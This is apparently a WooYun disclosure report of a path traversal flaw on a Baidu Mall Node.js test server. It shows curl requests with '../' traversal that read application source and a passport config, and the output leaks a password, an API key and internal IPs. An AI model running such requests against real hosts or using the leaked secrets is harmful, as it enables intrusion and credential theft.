乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-11: 细节已通知厂商并且等待厂商处理中 2015-08-11: 厂商已经确认,细节仅向厂商公开 2015-08-21: 细节向核心白帽子及相关领域专家公开 2015-08-31: 细节向普通白帽子公开 2015-09-10: 细节向实习白帽子公开 2015-09-25: 细节向公众公开
杀器在手!说走就走啊~
百度商城,貌似还没上线的业务(MALL.baidu.com)啊;http://180.149.144.64 这个是测试环境,尼玛node.js的,屌的一笔。首先是这样的。
[root@li498-106 ~]# curl "http://180.149.144.64/xxx"<!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>百度Mall</title> <link rel="shortcut icon" href="http://www.baidu.com/favicon.ico" > <script src="/js/common/core.js"></script> <script> require.config({ waitSeconds: 30, baseUrl: '/js' }); </script> </head> <body><h2>Not Found, url:/xxx</h2>Error: Not Found, url:/xxx at /home/work/mall_online/mall/app.js:50:15 at Layer.handle [as handle_request] (/home/work/mall_online/mall/node_modules/express/lib/router/layer.js:82:5) at trim_prefix (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:302:13) at /home/work/mall_online/mall/node_modules/express/lib/router/index.js:270:7 at Function.proto.process_params (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:321:12) at next (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:261:10) at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/serve-static/index.js:107:7) at SendStream.emit (events.js:107:17) at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:250:17) at SendStream.onStatError (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:346:48) <script> var GLOBAL_CONF = {"debug":true,"passport":{"host":"passport.rdtest.baidu.com","tpl":"cmovie"}}; </script> </body></html>
有报错,目测可以读文件,原谅我没有能读取系统任意文件,但是代码文件是可以随意读
[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/../config/passport.js"/** * @file passport.js * @author pengxing ([email protected]) * @description * passport conf */module.exports = { host: 'wappass.baidu.com', apid: 0x0523, tpl: 'cmovie', app_user: 'cmovie', app_passwd: 'cmovie', sapi: { 'cmovie_1315': '14c7e9fbcdb6d1eac8d6cc4b885babc8' }, server: { session: { port: 7801, timeout: 1000, servers: [] } }};// 机器列表 http://tc-passport-op00.tc.baidu.com/authorize/session/apply// 根据当前的idc,来判断请求哪个passportswitch (process.env.IDC) { case 'hz': case 'nj': // hz机房只有链接这两个机器才比较快 module.exports.server.session.servers = [ { ip: '10.212.7.12' }, { ip: '10.208.7.34' }, { ip: '10.202.6.38' } ]; break; // bj机房连接这四个passport都很快 case 'bj': default: module.exports.server.session.servers = [ { ip: '10.36.7.65' }, { ip: '10.65.211.140' }, { ip: '10.26.7.72' }, { ip: '10.81.211.104' } ];}/////////////////////////////////////////var globalConf = require('./global');if (globalConf.debug) { var offline = { host: 'passport.rdtest.baidu.com', server: { session: { port: 8998, timeout: 3000, servers: [ { ip: "10.48.20.13" } ] } } }; module.exports.host = offline.host; module.exports.server = offline.server;}
[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/config.js"var movie = require('./movie');var users = require('./users');var goodsList = require('./goodsList');var index = require('./index');var product = require('./product');var cart = require('./cart');var orderSure = require('./orderSure');var address = require('./address');var market = require('./market');var shop = require('./shop');var user = require('./user');var dal = require('../lib/dal');var url = require('./url');var common = require('./common');var test = require('./test');var login = require('./login');var flpurchase=require('./flpurchase');module.exports = function(app) { // 这个对象会作为前端的全局config对象使用 // 后续 config/categories 里的数据也用这种方式引入,避免每个请求都去处理一次。@shanshan app.locals.frontendConfig = { debug: require('../config/global').debug, passport: { host: require('../config/passport').host, tpl: require('../config/passport').tpl, } }; app.locals.menuCategories = require('../config/categories'); // passport var passport = require('../lib/middlewares/passport'); // app.use(passport.passport); app.get('/user/loginInfo', passport.passport, function (req, res ,next) { res.send(res.locals.user); }); app.use('/test', test); app.use('/login', login); app.use('/flpurchase',flpurchase); app.use('/common', common); app.use(url.homeIndex, user); app.get('/', index.home); app.use('/shop', shop); app.get('/movie/hot', movie.hot); app.get('/users', users.index); app.get('/goodsList', goodsList.search); app.use('/product',product); // app.get('/item/:id', product.product); app.use('/cart', cart); app.use('/market', market); app.use('/order', orderSure); app.use('/address', address);};
百度商城,貌似还没上线的业务啊;http://180.149.144.64 这个是测试环境,尼玛node.js的,屌的一笔。首先是这样的。
~
危害等级:低
漏洞Rank:5
确认时间:2015-08-11 11:29
感谢提交
暂无
